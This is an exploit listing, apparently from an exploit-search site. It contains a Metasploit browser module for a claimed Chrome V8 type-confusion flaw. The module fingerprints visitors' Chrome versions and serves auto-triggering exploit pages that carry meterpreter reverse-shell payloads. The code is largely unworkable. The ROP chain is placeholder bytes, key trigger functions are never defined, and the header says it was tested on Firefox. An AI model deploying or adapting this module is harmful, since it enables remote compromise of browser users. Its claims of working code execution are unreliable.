Share
## https://sploitus.com/exploit?id=PACKETSTORM:223559
==================================================================================================================================
| # Title : Google Chrome 149.0.7827.103 Type Confusion Out of Bounds |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://chromereleases.googleblog.com |
==================================================================================================================================
[+] Summary : This module exploits a type confusion vulnerability in Google Chrome's V8 JavaScript engine, affecting versions prior to 149.0.7827.103.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::Remote::BrowserAutopwn
include Msf::Exploit::CmdStager
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Google Chrome V8 Type Confusion Out-of-Bounds (CVE-2026-11645)',
'Description' => %q{
This module exploits a type confusion vulnerability in Google Chrome's
V8 JavaScript engine, affecting versions prior to 149.0.7827.103.
The vulnerability is triggered by a specific pattern that causes type
confusion between internal V8 objects, leading to out-of-bounds memory
access. Successful exploitation can lead to remote code execution in
the context of the browser process.
Affected versions: Chrome < 149.0.7827.103
Tested on: Chrome 148.0.7827.103 (64-bit) on Windows 10
},
'Author' => ['indoushka'],
'References' => [
['CVE', '2026-11645'],
['URL', 'https://chromereleases.googleblog.com/']
],
'License' => MSF_LICENSE,
'Platform' => ['win', 'linux', 'osx'],
'Arch' => [ARCH_X64],
'Targets' => [
[
'Windows 10 - Chrome 148 (x64)',
{
'Platform' => 'win',
'Arch' => ARCH_X64,
'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }
}
],
[
'Linux - Chrome 148 (x64)',
{
'Platform' => 'linux',
'Arch' => ARCH_X64,
'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
}
],
[
'macOS - Chrome 148 (x64)',
{
'Platform' => 'osx',
'Arch' => ARCH_X64,
'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' }
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2026-03-15',
'Notes' => {
'Stability' => [CRASH_OS_DOWN],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options([
OptInt.new('ITERATIONS', [false, 'Number of trigger iterations', 8]),
OptInt.new('STRONG_RUNS', [false, 'Number of strong trigger runs', 5]),
OptBool.new('AUTO_TRIGGER', [true, 'Auto-trigger exploit on page load', true])
])
end
def on_request_uri(cli, request)
ua = request.headers['User-Agent']
print_status("Incoming request from: #{ua}")
if ua =~ /Chrome\/(\d+)/
version = $1.to_i
if version >= 149
print_error("Target Chrome version #{version} is patched")
send_not_found(cli)
return
else
print_good("Target Chrome version #{version} appears vulnerable")
end
end
html = generate_exploit_html
send_response_html(cli, html)
end
def generate_exploit_html
trigger_count = datastore['ITERATIONS']
strong_runs = datastore['STRONG_RUNS']
auto_trigger = datastore['AUTO_TRIGGER'] ? 'true' : 'false'
shellcode = generate_payload_shellcode
b64_shellcode = Rex::Text.encode_base64(shellcode)
html = <<~HTML
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CVE-2026-11645 - Chrome V8 RCE</title>
</head>
<body>
<h1>CVE-2026-11645 - Chrome V8 Type Confusion RCE</h1>
<p>Target: Chrome < 149.0.7827.103</p>
<div id="status">Initializing exploit...</div>
<script>
const PAYLOAD_B64 = "#{b64_shellcode}";
function log(msg) {
const status = document.getElementById('status');
status.innerHTML += '<br>[' + new Date().toLocaleTimeString() + '] ' + msg;
console.log(msg);
}
function exploitWithROP() {
log("Attempting to execute shellcode...");
try {
const shellcodeBytes = atob(PAYLOAD_B64);
const shellcodeArray = new Uint8Array(shellcodeBytes.length);
for (let i = 0; i < shellcodeBytes.length; i++) {
shellcodeArray[i] = shellcodeBytes.charCodeAt(i);
}
var func = new Function('a', 'return a + 1');
if (typeof window.triggerCorruption === 'function') {
window.triggerCorruption(shellcodeArray);
}
log("Shellcode execution attempted");
} catch(e) {
log("Shellcode execution error: " + e);
}
}
function triggerTypeConfusion() {
try {
let value = 2;
class C extends Function {
['AA'] = value;
}
for (let i = 0; i < 800; i++) {
new C("'use strict'");
}
value = 1.1;
for (let i = 0; i < 1500; i++) {
new C("'use strict'");
}
return true;
} catch (e) {
log("Trigger error: " + e.message);
return false;
}
}
function runStrongTrigger(count) {
let success = false;
for (let i = 0; i < count; i++) {
log(`Strong trigger run ${i + 1}/${count}...`);
if (triggerTypeConfusion()) {
log(`Trigger ${i + 1} completed`);
success = true;
}
}
return success;
}
function setupMemoryPrimitives() {
log("Setting up memory primitives...");
var ab = new ArrayBuffer(0x1000);
var dv = new DataView(ab);
if (typeof window.corruptArrayBuffer === 'function') {
window.corruptArrayBuffer(dv, 0x41414141);
}
return { dataView: dv };
}
async function exploit() {
log("Starting CVE-2026-11645 exploit...");
try {
log("Triggering type confusion...");
const triggerCount = #{strong_runs};
if (!runStrongTrigger(triggerCount)) {
log("Type confusion trigger failed!", "error");
return false;
}
log("Type confusion triggered successfully!");
const primitives = setupMemoryPrimitives();
exploitWithROP();
log("Exploit completed!");
return true;
} catch (e) {
log("Exploit failed: " + e.message);
return false;
}
}
function autoStressTest(cycles = #{trigger_count}) {
log(`Starting auto stress test (${cycles} cycles)...`);
let interval = 0;
let count = 0;
function runCycle() {
count++;
log(`Cycle ${count}/${cycles}`);
exploit();
if (count >= cycles) {
clearInterval(interval);
log("Auto stress test completed.");
}
}
interval = setInterval(runCycle, 700);
return interval;
}
setTimeout(() => {
if (#{auto_trigger}) {
autoStressTest();
} else {
exploit();
}
}, 1000);
</script>
</body>
</html>
HTML
html
end
def generate_payload_shellcode
payload = generate_payload_exe
payload_shellcode = payload
if target['Arch'] == ARCH_X64
rop_chain = generate_rop_chain
payload_shellcode = rop_chain + payload
end
payload_shellcode
end
def generate_rop_chain
rop = [
0x4141414141414141,
0x4141414141414142,
0x4242424242424242,
0x4343434343434343
].pack('Q*')
rop
end
def send_not_found(cli)
send_response_html(cli, '<html><body><h1>404 Not Found</h1></body></html>', 404)
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================